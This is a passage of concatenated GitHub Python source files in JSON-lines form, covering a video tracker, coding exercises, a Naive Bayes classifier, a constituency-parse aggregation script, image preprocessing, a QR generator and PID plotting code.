labels=masks.view(-1, *masks.shape[-3:]))\n\n def apply_target_model(self, feat_tm, tm_filter, feat_bbone=None, im_size=None, decode=False):\n assert tm_filter.dim() == 5 # seq, filters, ch, h, w\n feat_tm = feat_tm.view(1, 1, *feat_tm.shape[-3:])\n mask_pred_enc = self.net.target_model.apply_target_model(tm_filter, feat_tm)\n if decode:\n mask_pred, decoder_feat = self.net.decoder(mask_pred_enc, feat_bbone, im_size)\n return mask_pred_enc, mask_pred\n return mask_pred_enc\n\n def update_target_model(self, train_x, mask, 
learning_rate=None):\n\n # Update the tracker memory\n lr = self.params.learning_rate if learning_rate is None else learning_rate\n if self.frame_num % self.params.get('train_sample_interval', 1) == 0:\n self.memory.update(TensorList([train_x]), mask, lr)\n\n # Decide the number of iterations to run\n num_iter = 0\n if (self.frame_num - 1) % self.params.train_skipping == 0:\n num_iter = self.params.get('net_opt_update_iter', None)\n\n if num_iter > 0:\n with torch.no_grad():\n # Read memory, encode masks\n samples, masks, sample_weights = self.memory.read()\n mask_enc, mask_sw = self.net.label_encoder(masks.unsqueeze(1), samples.unsqueeze(1))\n\n if mask_sw is not None:\n # mask_sw provides spatial weights, while sample_weights contains temporal weights.\n sample_weights = mask_sw * sample_weights.view(-1, 1, 1, 1, 1)\n\n # Optimize the target model filter\n target_filter, _, losses = self.net.target_model.filter_optimizer(\n TensorList([self.target_filter]), num_iter=num_iter,\n feat=samples.unsqueeze(1), label=mask_enc, sample_weight=sample_weights)\n\n self.target_filter = target_filter[0]\n\n","repo_name":"andr345/davos","sub_path":"davos/eval/trackers/dlwl.py","file_name":"dlwl.py","file_ext":"py","file_size_in_byte":20047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"104862196","text":"# read two values, x and y;\n# use the map function and split;\n\n\n\nx, y = list(map(int, input().split()))\ncontador = 1\nfor _ in range(1, int(y/x)+1):\n msg = \"\"\n for _ in range(x):\n msg += str(contador)+\" \"\n contador += 1\n print(msg[:-1])","repo_name":"renatadecassiapires/beecrowd","sub_path":"exercicios_nivel_1_iniciante/exercicio1145/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71459828871","text":"import pandas as pd\r\n\r\n# Feature columns we use\r\nx_rows=['MDVP:Fo(Hz)','MDVP:Fhi(Hz)','MDVP:Flo(Hz)',\r\n 'MDVP:Jitter(%)','MDVP:Jitter(Abs)','MDVP:RAP','MDVP:PPQ','Jitter:DDP']\r\n# x_rows=['MDVP:Fo(Hz)']\r\ny_rows=['status']\r\n\r\n# Train\r\n\r\n# Read train data\r\ntrain_data = pd.read_csv('parkinsons/Data_Parkinsons_TRAIN.csv')\r\ntrain_x = train_data[x_rows]\r\ntrain_y = train_data[y_rows]\r\nprint(\"train_x:\\n\", train_x)\r\nprint(\"train_y:\\n\", train_y)\r\n\r\n# Load sklearn Gaussian Naive Bayes and fit\r\nfrom sklearn.naive_bayes import GaussianNB \r\n\r\ngnb = GaussianNB() \r\ngnb.fit(train_x, train_y) \r\n\r\n# Prediction on train data\r\npredict_train = gnb.predict(train_x)\r\nprint('Prediction on train data:', predict_train) \r\n\r\n# Accuracy score on train data\r\nfrom sklearn.metrics import accuracy_score\r\naccuracy_train = accuracy_score(train_y, predict_train)\r\nprint('Accuracy score on train data:', accuracy_train)\r\n\r\n# Test\r\n\r\n# Read test data\r\ntest_data = pd.read_csv('parkinsons/Data_Parkinsons_TEST.csv')\r\ntest_x = test_data[x_rows]\r\ntest_y = test_data[y_rows]\r\n\r\n# Prediction on test data\r\npredict_test = gnb.predict(test_x)\r\nprint('Prediction on test data:', predict_test) \r\n\r\n# Accuracy Score on test data\r\naccuracy_test = accuracy_score(test_y, predict_test)\r\nprint('Accuracy score on test data:', accuracy_test)\r\n\r\n# Prediction on unknown data\r\n# predict_unknown = gnb.predict([[150,160,70,0,0,0,0,0]])\r\npredict_unknown = gnb.predict([[240,250,230,0,0,0,0,0]])\r\nprint('Prediction on unknown data:', predict_unknown)
\r\n","repo_name":"gammay/Machine-learning-made-easy-Naive-Bayes","sub_path":"naive_bayes_parkinsons.py","file_name":"naive_bayes_parkinsons.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"19207246212","text":"\n\n\"\"\"\n445. Add Two Numbers II——M\n\nhttps://leetcode.com/problems/add-two-numbers-ii/\n#################################\n考点或思路:\n[solution: ]\nSimilar problems:\n2. Add Two Numbers\n\n\"\"\"\nfrom typing import List\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n \"\"\"\n time: 0721/2022 10:35--11:00\n [Approach] Since the last index of the linkedlist would be the ones place of a number, we can go through \n it twce to solve the problem.\n First, we go throught each linkedlist, for each node in it, we add a attribute for it, we add a prePointer, which pointing to the pre node of it. meanwhile, we can get the last node of the linkedlist, which is also the once place of the number.\n Then, we start from the last node of each linkedlist, we add them and we track the carry of it.\n we can use the prePointer to get the next place node.and we continue do so till the hightes place.\n time_O(N+M) we go through each node twce. N= len(l1) M = len(l2)\n space_O(N+M) we need a new pointer for each node.\n \"\"\"\n \n p1 = l1\n p1.pre = None\n \n while p1.next:\n p1.next.pre = p1\n p1 = p1.next\n \n p2 = l2\n p2.pre = None\n while p2.next:\n p2.next.pre = p2\n p2 = p2.next\n \n dummy = ListNode(\"d\")\n carry = 0\n while p1 and p2:\n curVal = (p1.val + p2.val + carry) % 10\n carry = (p1.val + p2.val + carry) // 10\n node = ListNode(curVal,dummy.next)\n dummy.next = node\n p1 = p1.pre\n p2 = p2.pre\n \n while p1:\n curVal = (p1.val + carry) % 10\n carry = (p1.val + carry) // 10\n node = ListNode(curVal,dummy.next)\n dummy.next = node\n p1 = p1.pre\n \n while p2:\n curVal = (p2.val + carry) % 10\n carry = (p2.val + carry) // 10\n node = ListNode(curVal,dummy.next)\n dummy.next = node\n p2 = p2.pre\n if carry:\n node = ListNode(carry,dummy.next)\n dummy.next = node\n \n return dummy.next\n \n \n\n ","repo_name":"jellyfiona/LeetCode","sub_path":"LinkedList/445. Add Two Numbers II_M.py","file_name":"445. Add Two Numbers II_M.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37262682338","text":"from collections import defaultdict\nfrom typing import List\n\n\nclass Solution:\n \"\"\"\n n - len(cp_domains)\n m - len(max(cp_domains)) - max string len\n\n Time: O(n * m)\n Space: O(n) - each domain will contain 2-3 dots\n \"\"\"\n\n def subdomainVisits(self, cp_domains: List[str]) -> List[str]:\n domains = defaultdict(int)\n for cp_domain in cp_domains:\n visits, domain = cp_domain.split()\n visits = int(visits)\n domains[domain] += visits\n\n for i, char in enumerate(domain):\n if char == \".\":\n domains[domain[i + 1:]] += visits\n\n return [f\"{visits} {domain_name}\" for domain_name, visits in domains.items()]\n","repo_name":"Vasilic-Maxim/LeetCode-Problems","sub_path":"problems/811. 
Subdomain Visit Count/1 - Use Hash Map.py","file_name":"1 - Use Hash Map.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17481901739","text":"import argparse\nimport gzip\nimport multiprocessing\nimport collections\nimport os\nimport random\nimport re\nimport nltk\nfrom tqdm import tqdm\n\n'''\npython utils/MAP_constituent.py --dirs ./wsj20dev_D2K15/ ./wsj20dev_D2K15_1/ \n./wsj20dev_D2K15_2 ./wsj20dev_D2K15_3 \n./wsj20dev_D2K15_4 ./wsj20dev_D2K15_5 \n./wsj20dev_D2K15_6 ./wsj20dev_D2K15_7 \n./wsj20dev_D2K15_9 --process 15 --output-fn test.txt.linetrees.gz --max-iter 650 --min-iter 550\n'''\n\ndef read_linetrees_file(fn):\n with gzip.open(fn, 'rt') as fh:\n trees = fh.readlines()\n # for line in fh:\n # tree = nltk.Tree.fromstring(line)\n # trees.append(tree)\n return trees\n\ndef add_index_to_leaves(tree):\n for leaf_index, leaf_position in enumerate(tree.treepositions(order='leaves')):\n tree[leaf_position] = tree[leaf_position] + '||' + str(leaf_index)\n\ndef argmax_bottom_up(dic, constituent_units):\n max_keys = []\n max_val = 0\n max_list_index = []\n bigram_tuples = [ (const, constituent_units[index+1]) for index, const in enumerate(\n constituent_units[:-1])]\n bigrams = [' '.join([const, constituent_units[index+1]]) for index, const in enumerate(\n constituent_units[:-1])]\n for index, key in enumerate(bigrams):\n if dic[key] > max_val:\n max_val = dic[key]\n max_keys = [key]\n max_list_index = [index]\n elif dic[key] == max_val:\n max_keys.append(key)\n max_list_index.append(index)\n if len(max_list_index) == 1:\n max_index = max_list_index[0]\n else:\n max_index = random.choice(max_list_index)\n return bigram_tuples[max_index], max_val\n\ndef argmax_top_down_nary(tree_const_list, constituent_units):\n if len(constituent_units) == 1:\n return [tuple(constituent_units), ], ['(' + re.sub('\\|\\|\\d+', '', constituent_units[0]) +\n ') :1', ]\n solution = []\n prob_strings = []\n max_keys = []\n max_val = 0\n max_list_index = []\n bigram_tuples = []\n for i in range(1, len(constituent_units)):\n bigram_tuples.append((constituent_units[:i], constituent_units[i:]))\n bigrams = [(' '.join(left), ' '.join(right)) for left, right in bigram_tuples]\n counts = {x: 0 for x in bigrams}\n for tree_index, tree_const in enumerate(tree_const_list):\n for const in bigrams:\n left = const[0]\n right = const[1]\n if left in tree_const and right in tree_const:\n counts[const] += 1\n for bigram in counts:\n if counts[bigram] > max_val:\n max_val = counts[bigram]\n max_keys = [bigram]\n max_list_index = [bigrams.index(bigram)]\n elif counts[bigram] == max_val:\n max_keys.append(bigram)\n max_list_index.append(bigrams.index(bigram))\n if len(max_keys) == 1:\n max_index = max_list_index[0]\n else:\n max_index = random.choice(max_list_index)\n total_counts = sum(counts.values())\n vals = [counts[bigram] for bigram in bigrams]\n sorted_vals = sorted(vals, reverse=True)\n # vals.sort(reverse=True)\n # assert vals[0] == max_val\n probs = [x / total_counts for x in vals]\n prob_string = '(' + ') , ('.join([re.sub('\\|\\|\\d+', '', x) for x in bigrams[max_index]]) + ') ' \\\n ':' + ' '.join(['{:.4f}'.format(x) for x in probs])\n sorted_probs = [ x / total_counts for x in sorted_vals]\n if (len(constituent_units) == 4 or len(constituent_units) == 3) and sorted_probs[0] - \\\n sorted_probs[1] <= 0.3 and flattening:\n solution.append(tuple([x,] for x in constituent_units))\n prob_strings.append(prob_string)\n # 
return solution, prob_strings\n else:\n solution.append(bigram_tuples[max_index])\n prob_strings.append(prob_string)\n for const in solution[-1]:\n part_solution, prob_string = argmax_top_down_nary(tree_const_list, const)\n solution.extend(part_solution)\n prob_strings.extend(prob_string)\n return solution, prob_strings\n\ndef argmax_top_down(tree_const_list, constituent_units):\n if len(constituent_units) == 1:\n return [tuple(constituent_units),],[ '(' + re.sub('\\|\\|\\d+', '', constituent_units[0]) +\n ') :1',]\n solution = []\n prob_strings = []\n max_keys = []\n max_val = 0\n max_list_index = []\n bigram_tuples = [ ]\n for i in range(1, len(constituent_units)):\n bigram_tuples.append((constituent_units[:i], constituent_units[i:]))\n bigrams = [(' '.join(left), ' '.join(right)) for left, right in bigram_tuples]\n counts = {x : 0 for x in bigrams}\n for tree_index, tree_const in enumerate(tree_const_list):\n for const in bigrams:\n left = const[0]\n right = const[1]\n if left in tree_const and right in tree_const:\n counts[const] += 1\n for bigram in counts:\n if counts[bigram] > max_val:\n max_val = counts[bigram]\n max_keys = [bigram]\n max_list_index = [bigrams.index(bigram)]\n elif counts[bigram] == max_val:\n max_keys.append(bigram)\n max_list_index.append(bigrams.index(bigram))\n if len(max_keys) == 1:\n max_index = max_list_index[0]\n else:\n max_index = random.choice(max_list_index)\n total_counts = sum(counts.values())\n vals = [ counts[bigram] for bigram in bigrams ]\n # vals.sort(reverse=True)\n # assert vals[0] == max_val\n probs = [x / total_counts for x in vals]\n prob_string = '(' + ') , ('.join([re.sub('\\|\\|\\d+', '', x) for x in bigrams[max_index]]) + ') ' \\\n ':' + ' '.join(['{:.4f}'.format(x) for x in probs])\n solution.append(bigram_tuples[max_index])\n prob_strings.append(prob_string)\n for const in bigram_tuples[max_index]:\n part_solution, prob_string = argmax_top_down(tree_const_list, const)\n solution.extend(part_solution)\n prob_strings.extend(prob_string)\n return solution, prob_strings\n\ndef process_single_tree_bottom_up(tree_list):\n tree_list = [nltk.Tree.fromstring(t) for t in tree_list]\n span_counter = collections.Counter()\n for tree in tree_list:\n spans = []\n add_index_to_leaves(tree)\n for subtree in tree.subtrees():\n spans.append(' '.join(tuple(subtree.leaves())))\n span_counter.update(spans)\n sent = tree_list[0].leaves()\n solution = []\n while len(sent) > 1:\n (max_left, max_right), max_count = argmax_bottom_up(span_counter, sent)\n solution.append((max_left, max_right))\n left_index = sent.index(max_left)\n right_index = sent.index(max_right)\n sent[left_index] = ' '.join((max_left, max_right))\n del sent[right_index]\n solution += [(x,) for x in tree_list[0].leaves()]\n # solution = clean_solution(solution)\n sent = tree_list[0].leaves()\n return solution_to_tree(sent, solution)\n\ndef process_single_tree_top_down(tree_list):\n tree_list = [nltk.Tree.fromstring(t) for t in tree_list]\n all_tree_spans = []\n for tree in tree_list:\n this_spans = []\n add_index_to_leaves(tree)\n for subtree in tree.subtrees():\n this_spans.append(' '.join(tuple(subtree.leaves())))\n all_tree_spans.append(this_spans)\n sent = tree_list[0].leaves()\n\n # solution, prob_strings = argmax_top_down(all_tree_spans, sent)\n solution, prob_strings = argmax_top_down_nary(all_tree_spans, sent)\n # print(solution)\n for index, const in enumerate(solution):\n if len(const) > 1:\n children = []\n for child in const:\n child = ' '.join(child)\n children.append(child)\n 
solution[index] = tuple(children)\n\n sent = tree_list[0].leaves()\n return solution_to_tree(sent, solution), prob_strings\n\ndef test():\n t1 = \"(X (X (X (X a) (X b)) (X c)) (X d))\"\n t2 = \"(X (X (X a) (X b)) (X (X c) (X d)))\"\n t3 = \"(X (X a) (X (X b) (X (X c) (X d))))\"\n t4 = \"(X (X a) (X (X b) (X (X c) (X d))))\"\n\n ts = [t1, t2, t3, t4]\n # sent = nltk.Tree.fromstring(t1)\n # add_index_to_leaves(sent)\n # sent = sent.leaves()\n # print(sent)\n solution = process_single_tree_top_down(ts)\n print(solution)\n # print(solution_to_tree(sent, solution))\n solution = process_single_tree_bottom_up(ts)\n print(solution)\n # print(solution_to_tree(sent, solution))\n\ndef solution_to_tree(string, solution):\n if isinstance(string, str):\n string = string.split(' ')\n str_len = len(string)\n for consts in solution:\n if len(consts) > 1:\n const_span_len = sum([len(x.split(' ')) for x in consts])\n first_word = consts[0].split(' ')[0]\n else:\n const_span_len = 1\n first_word = consts[0]\n if const_span_len == str_len and string[0] == first_word:\n if len(consts) > 1:\n children = []\n for child in consts:\n child = solution_to_tree(child, solution)\n children.append(child)\n else:\n return nltk.Tree('X', children=[re.sub('\\|\\|\\d+', '', first_word)])\n this_tree = nltk.Tree('X', children=children)\n return this_tree\n\ndef wrap_file_func(i, arg):\n return i, read_linetrees_file(arg)\n\ndef wrap_bottom_up_func(i, arg):\n return i, process_single_tree_bottom_up(arg)\n\ndef wrap_top_down_func(i, arg):\n return i, process_single_tree_top_down(arg)\n\ndef update(i_ans):\n i = i_ans[0]\n ans = i_ans[1]\n best_trees[i] = ans\n # print(ans[0])\n pbar.update()\n\ndef file_update(i_ans):\n i = i_ans[0]\n ans = i_ans[1]\n trees[i] = ans\n pbar.update()\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--dirs', '-d', nargs='+', help='the directories that contain the linetree '\n 'samples')\n parser.add_argument('--mode', '-m', choices=['tree', 'const'], help='the MAP mode: on trees or on '\n 'const[ituents]')\n parser.add_argument('--processes', '-p', type=int, help='number of parallel processes')\n parser.add_argument('--order', '-o', default='top-down', choices=['bottom-up', 'top-down'], help='which order is '\n 'the optimal '\n 'tree generated')\n parser.add_argument('--test', '-t', action='store_true', default=False)\n parser.add_argument('--output-fn', '-of', type=str, help='name of the output file')\n parser.add_argument('--max-iter', type=int, default=10000, help='the maximum iteration '\n 'linetrees ' \\\n 'file used')\n parser.add_argument('--min-iter', type=int, default=-1, help='the minimum iteration linetrees '\n 'file ' \\\n 'used')\n parser.add_argument('--flattening', default=False, action='store_true', help='turn on '\n 'posterior '\n 'flattening')\n args = parser.parse_args()\n if args.test:\n test()\n exit(0)\n flattening = args.flattening\n\n dirs = args.dirs\n\n fns = []\n\n best_trees = []\n print('Reading in the directory info.')\n for directory in dirs:\n for f in os.listdir(directory):\n if re.match(\"iter_[\\d]+\\.linetrees\\.gz\", f):\n iter_num = re.search('(?<=er_)\\d+', f).group(0)\n if int(iter_num) < args.max_iter and int(iter_num) > args.min_iter:\n fns.append(os.path.join(directory,f))\n\n print('Processing {} individual files.'.format(len(fns)))\n with multiprocessing.Pool(args.processes) as pool:\n\n pbar = tqdm(total=len(fns))\n trees = [None] * len(fns)\n for i in range(len(fns)):\n pool.apply_async(wrap_file_func, 
args=(i, fns[i]),\n callback=file_update)\n pool.close()\n pool.join()\n pbar.close()\n\n with multiprocessing.Pool(args.processes) as pool:\n print('Zipping the trees together.')\n trees_for_single_sent_list = list(zip(*trees))\n print(len(trees_for_single_sent_list), 'number of trees to be processed.')\n\n print(\"Processing individual trees.\")\n pbar = tqdm(total=len(trees_for_single_sent_list))\n best_trees = [None] * len(trees_for_single_sent_list)\n for i in range(len(trees_for_single_sent_list)):\n if args.order == 'bottom-up':\n pool.apply_async(wrap_bottom_up_func, args=(i, trees_for_single_sent_list[i]),\n callback=update)\n elif args.order == 'top-down':\n pool.apply_async(wrap_top_down_func, args=(i, trees_for_single_sent_list[i]),\n callback=update)\n pool.close()\n pool.join()\n pbar.close()\n\n print(\"Writing out results.\")\n with gzip.open(args.output_fn, 'wt') as ofh:\n if args.order == 'top-down':\n probfh = gzip.open(args.output_fn+'.probs', 'wt')\n for tree in best_trees:\n # print(tree)\n if args.order == 'top-down':\n some_tree, probs = tree\n string = some_tree.pformat(margin=100000)\n print('SENT:', string, file=probfh)\n for item in probs:\n # print(item)\n assert isinstance(item, str)\n\n print(item, file=probfh)\n else:\n some_tree = tree\n\n string = some_tree.pformat(margin=100000)\n print(string, file=ofh)\n probfh.close()","repo_name":"lifengjin/dimi_emnlp18","sub_path":"utils/MAP_constituent.py","file_name":"MAP_constituent.py","file_ext":"py","file_size_in_byte":14150,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"41099442604","text":"import cv2\nimport numpy as np\n\nclass ImagePreprocessor:\n def __init__(self):\n return\n\n def getPreprocessingResults(self, image):\n return self.performPreprocessing(image)\n\n def resizingImage(self, image):\n # Standard scale is 700x700 pixels\n standardScale = 500\n height, width, layers = image.shape\n if (height > standardScale or width > standardScale):\n maximumSize = max(height, width)\n scalePercent = standardScale / maximumSize\n width = int(width * scalePercent)\n height = int(height * scalePercent)\n dim = (width, height)\n return cv2.resize(image, dim, interpolation=cv2.INTER_AREA)\n else:\n return image\n\n def equalizeContrast(self, image):\n intensitiesValues = np.arange(256, dtype=np.float)\n probabilitiesValues = np.arange(256, dtype=np.float)\n for i in range(256):\n intensitiesValues[i] = 0\n\n rows, columns = image.shape\n for i in range(rows):\n for j in range(columns):\n intensitiesValues[image[i, j]] += 1\n\n for k in range(256):\n probabilitiesValues[k] = intensitiesValues[k] / (rows * columns)\n\n # Apply histogram equalization transformation function\n newIntensityValues = np.arange(256, dtype=np.float)\n for i in range(256):\n newIntensityValues[i] = 0\n\n transformedImg = image.copy()\n for i in range(256):\n sum = 0\n for j in range(i):\n sum += probabilitiesValues[j]\n newIntensityValues[i] = round(sum * 255)\n for i in range(rows):\n for j in range(columns):\n transformedImg[i, j] = newIntensityValues[image[i, j]]\n return transformedImg\n\n\n def normalizeImage(self, image):\n # Because it is an 8-bit image\n image = cv2.cvtColor(image, cv2.COLOR_RGB2YCrCb)\n channels = cv2.split(image)\n channels[0] = self.equalizeContrast(channels[0])\n cv2.merge(channels, image)\n image = cv2.cvtColor(image, cv2.COLOR_YCrCb2RGB)\n return image\n\n def sharpeningImage(self, image):\n laplacianKernel = np.array(\n [[0, -1, 0],\n [-1, 5, 
-1],\n [0, -1, 0]]\n )\n return cv2.filter2D(image, -1, laplacianKernel)\n\n def performPreprocessing(self, image):\n #image = self.resizingImage(image)\n image = self.normalizeImage(image)\n return image\n\n def backingupImage(self, image):\n cv2.imwrite(\"../../assets/images/PreprocessingResults/PreprocessingResults.png\", image)","repo_name":"hamzafer/Visual-Assistant","sub_path":"backend/Classes/ImagePreprocessor.py","file_name":"ImagePreprocessor.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"43391529815","text":"def func_task1(cage):\r\n for i in range(3):\r\n if cage[i][0] == cage[i][1] == cage[i][2] and cage[i][0] != ' ':\r\n return cage[i][0]\r\n for j in range(3):\r\n if cage[0][j] == cage[1][j] == cage[2][j] and cage[0][j] != ' ':\r\n return cage[0][j]\r\n if cage[0][0] == cage[1][1] == cage[2][2] and cage[0][0] != ' ':\r\n return cage[0][0]\r\n if cage[0][2] == cage[1][1] == cage[2][0] and cage[0][2] != ' ':\r\n return cage[0][2]\r\n return \"Draw\"\r\n\r\ncage = [\r\n ['X', 'X', 'X'],\r\n ['O', 'X', 'O'],\r\n ['O', 'X', 'O']\r\n]\r\n\r\nprint(func_task1(cage), \"won\")\r\n","repo_name":"glamiturianmai/alg-5","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23142675786","text":"from tkinter import *\nimport pyqrcode\nimport png\nfrom tkinter import filedialog\nfrom PIL import Image, ImageTk\n\nroot=Tk()\nroot.title(\"QR Code Generator\")\nroot.geometry('500x550')\ndef create_code():\n #file path\n input_path = filedialog.asksaveasfilename(title='Saved Image', filetypes=((\"PNG File\", \".png\"),(\"ALL Files\", \"*.*\"))) \n if input_path:\n if input_path.endswith(\".png\"):\n #qr generator\n get_code = pyqrcode.create(my_entry.get())\n\n #file save\n get_code.png(input_path, scale=5)\n\n\n else:\n #add png\n input_path = f'{input_path}.png'\n #create qr code\n get_code = pyqrcode.create(my_entry.get())\n #save png\n get_code.png(input_path, scale=5)\n\n #put qr in new window\n global get_image\n get_image = ImageTk.PhotoImage(Image.open(input_path))\n #add image to label\n my_label.config(image = get_image)\n #clear entry box\n my_entry.delete(0,END)\n #successfully generated\n my_entry.insert(0,'Successfully Generated!')\n\ndef clear_all():\n my_entry.delete(0,END)\n my_label.config(image='')\n\n#GUI\nmy_entry = Entry(root, font=(\"Helvetica\", 20))\nmy_entry.pack(pady=20)\n\nmy_button = Button(root,text= \"Generate\", command=create_code)\nmy_button.pack(pady=20)\n\nmy_button2= Button(root, text=\"clear\", command=clear_all)\nmy_button2.pack()\n\nmy_label = Label(root, text= '')\nmy_label.pack(pady=20)\n\nroot.mainloop()","repo_name":"ashiqu-ali/QR-code-Generator","sub_path":"qrgenerator.py","file_name":"qrgenerator.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"5684223395","text":"import os\nimport sys\nimport time\nimport pretty_midi\nsys.path.append(os.path.join(os.path.dirname(__file__), '../../..'))\nfrom uarm.wrapper import SwiftAPI\n\nswift1 = SwiftAPI(filters={'hwid': 'USB VID:PID=2341:0042'})\n# swift2 = SwiftAPI(filters={'hwid': 'USB VID:PID=2341:0042'})\n# swift3 = SwiftAPI(filters={'hwid': 'USB VID:PID=2341:0042'})\n\nswift1.waiting_ready()\ndevice_info = swift1.get_device_info()\nprint(swift1.port, 
device_info)\nfirmware_version = device_info['firmware_version']\nif firmware_version and not firmware_version.startswith(('0.', '1.', '2.', '3.')):\n swift1.set_speed_factor(0.00001)\n\ntime.sleep(1)\n\n\nd = {\n \"A\" : 0,\n \"A#\" : 1, \n \"B\" : 2,\n \"C\" : 3,\n \"C#\" : 4,\n \"D\" : 5,\n \"D#\" : 6,\n \"E\" : 7,\n \"F\" : 8,\n \"F#\" : 9,\n \"G\" : 10,\n \"G#\" : 11\n\n}\n\ndef freq(sc, pitch):\n return 440 * pow(2, ( d[sc] + pitch * 12 ) / 12)\n\n\n# midiData = pretty_midi.PrettyMIDI('')\n\nswift1.set_buzzer(frequency=freq(\"C\", -1), duration=0.5)","repo_name":"Nwnn/uarmswift-apps","sub_path":"music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40883672509","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mesostat.visualization.mpl_colors import base_colors_rgb\n\n\n# Convert degrees to radians\ndef _deg2rad(phi):\n return phi * np.pi / 180\n\n\n# Rotate a vector clockwise around the origin\ndef _rot(p, phi):\n s = np.sin(phi)\n c = np.cos(phi)\n R = np.array([[c, -s], [s, c]])\n return R.dot(p)\n\n\n# Get coordinates of equilateral triangle of given origin, radius and rotation\ndef _uni_triangle_points(p0, rad, phi):\n pRef = np.array([rad, 0])\n p1 = p0 + _rot(pRef, _deg2rad(phi))\n p2 = p0 + _rot(pRef, _deg2rad(phi + 120))\n p3 = p0 + _rot(pRef, _deg2rad(phi + 240))\n return p1, p2, p3\n\n\n# Construct a line segment between points p1 and p2\n# Shift that line segment by sh\n# Direction of shift determined by angle phi relative to the original direction of the vector p2-p1\n# Return list of x and y coordinates separately\ndef _sh_line_points(p1, p2, phi, sh):\n v = p2 - p1\n vSh = v / np.linalg.norm(v) * sh # Normalize\n vShRot = _rot(vSh, phi) # Rotate\n p1sh = p1 + vShRot # Shift\n p2sh = p2 + vShRot # Shift\n return [p1sh[0], p2sh[0]], [p1sh[1], p2sh[1]]\n\n\ndef sketch_pid(ax, pidDict, colorsDict=None,\n radiusMacro=3, radiusCircle=1, colorCircle='lightgray', maxLineWidth=15,\n rotation=90, fontsize=30):\n '''\n :param ax: Plot axis\n :param u1: Unique information, source X. Allowed values between [0, 1], please rescale\n :param u2: Unique information, source Y. Allowed values between [0, 1], please rescale\n :param red: Redundant information, target Z. Allowed values between [0, 1], please rescale\n :param syn: Synergistic information, target Z. 
Allowed values between [0, 1], please rescale\n :param radiusMacro: Radius on which the three circles are placed\n :param radiusCircle: Radius of each circle\n :param colorCircle: Color of each circle\n :param maxLineWidth: Maximum line width for unique and synergistic lines\n :param colorU1: Color of Unique information, source X\n :param colorU2: Color of Unique information, source Y\n :param colorRed: Color of Redundant information, target X\n :param colorSyn: Color of Synergistic information, target X\n :param rotation: Rotation of the plot (direction where target is pointing)\n :param fontsize: Font size for source and target labels\n :return:\n '''\n\n\n if colorsDict is None:\n tableauColors = base_colors_rgb(key='tableau')\n colorsDict = {\n 'unq_s1' : tableauColors[0],\n 'unq_s2' : tableauColors[1],\n 'shd_s1_s2' : tableauColors[2],\n 'syn_s1_s2' : tableauColors[3]\n }\n\n # Center plot at origin\n p0 = np.array([0, 0])\n\n ##################################\n # Construct and annotate circle\n ##################################\n pZ, pX, pY = _uni_triangle_points(p0, radiusMacro, rotation)\n\n circleX = plt.Circle(pX, radius=radiusCircle, color=colorCircle, zorder=2)\n circleY = plt.Circle(pY, radius=radiusCircle, color=colorCircle, zorder=2)\n circleZ = plt.Circle(pZ, radius=radiusCircle, color=colorCircle, zorder=2)\n\n ax.add_patch(circleX)\n ax.add_patch(circleY)\n ax.add_patch(circleZ)\n\n labelX = ax.annotate(\"X\", xy=pX, fontsize=fontsize, ha=\"center\", va=\"center\")\n labelY = ax.annotate(\"Y\", xy=pY, fontsize=fontsize, ha=\"center\", va=\"center\")\n labelZ = ax.annotate(\"Z\", xy=pZ, fontsize=fontsize, ha=\"center\", va=\"center\")\n\n\n ##################################\n # Construct and annotate Unique and Redundant\n ##################################\n\n linewidthU1 = maxLineWidth * pidDict['unq_s1']\n linewidthU2 = maxLineWidth * pidDict['unq_s2']\n linewidthRed = maxLineWidth * pidDict['shd_s1_s2']\n\n lpUnqXZ = _sh_line_points(pX, pZ, _deg2rad(90), radiusCircle / 2)\n lpUnqYZ = _sh_line_points(pY, pZ, _deg2rad(-90), radiusCircle / 2)\n lpRedXZ = _sh_line_points(pX, pZ, _deg2rad(-90), 0)\n lpRedYZ = _sh_line_points(pY, pZ, _deg2rad(90), 0)\n\n lineUnqXZ = plt.Line2D(*lpUnqXZ, color=colorsDict['unq_s1'], linewidth=linewidthU1, zorder=1)\n lineUnqYZ = plt.Line2D(*lpUnqYZ, color=colorsDict['unq_s2'], linewidth=linewidthU2, zorder=1)\n lineRedXZ = plt.Line2D(*lpRedXZ, color=colorsDict['shd_s1_s2'], linewidth=linewidthRed, zorder=1)\n lineRedYZ = plt.Line2D(*lpRedYZ, color=colorsDict['shd_s1_s2'], linewidth=linewidthRed, zorder=1)\n\n ax.add_line(lineUnqXZ)\n ax.add_line(lineUnqYZ)\n ax.add_line(lineRedXZ)\n ax.add_line(lineRedYZ)\n\n\n ##################################\n # Construct and annotate Synergy\n ##################################\n\n radiusSynergy = (radiusMacro - radiusCircle) * pidDict['syn_s1_s2']\n pZsyn, pXsyn, pYsyn = _uni_triangle_points(p0, radiusSynergy, rotation)\n\n triangleSyn = plt.Polygon(np.array([pXsyn, pYsyn, 